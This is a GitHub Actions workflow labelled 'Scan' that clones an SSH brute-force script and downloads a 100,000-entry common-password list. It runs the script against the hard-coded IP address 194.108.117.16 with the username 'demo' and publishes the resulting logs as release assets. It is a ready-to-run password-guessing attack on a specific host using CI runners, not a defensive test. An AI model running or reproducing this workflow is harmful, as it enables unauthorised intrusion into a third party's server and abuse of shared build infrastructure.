name: Scan

on:
  workflow_dispatch:
  release:
    types: [published]  
    
jobs:
  download-and-release:
    runs-on: ubuntu-latest
    
    steps:
    - name: Checkout repository
      uses: actions/checkout@v4
      with:
        fetch-depth: 0

    - name: Download files
      run: |
        sudo apt update
        sudo apt install nmap wget -y
        mkdir -p downloads
        cd downloads
        
    - name: Clone the Repository
      run: |
        git clone https://github.com/xiv3r/bruter.git
        cd bruter
        chmod +x bruter.sh
        ls -lh
        
    - name: Make User
      run: |
        echo demo > user.txt

    - name: Download Password
      run: |
        wget -O passwords.txt https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt

    - name: Scanning in progress 
      run: |
         bash bruter.sh ssh user.txt passwords.txt 194.108.117.16 output.log
         ls -la
         
    - name: Determine release tag
      id: get_tag
      run: |
        if [ "${{ github.event_name }}" == "release" ]; then
          TAG_NAME="${{ github.event.release.tag_name }}"
        else
          # Use the existing "rootfs" tag
          TAG_NAME="results"
        fi
        echo "tag_name=$TAG_NAME" >> $GITHUB_OUTPUT

    - name: Upload files to existing release
      uses: softprops/action-gh-release@v1
      with:
        tag_name: ${{ steps.get_tag.outputs.tag_name }}
        files: |
            downloads/bruter/*.log
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
